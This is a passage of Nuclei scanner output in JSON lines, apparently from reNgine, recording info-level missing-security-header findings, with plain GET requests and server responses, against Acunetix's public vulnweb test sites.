Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:52.4080749Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/css\",\"path\":\"/static/css\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/css/\",\"request\":\"GET /static/css HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:52.408190719Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:52.553494099Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca 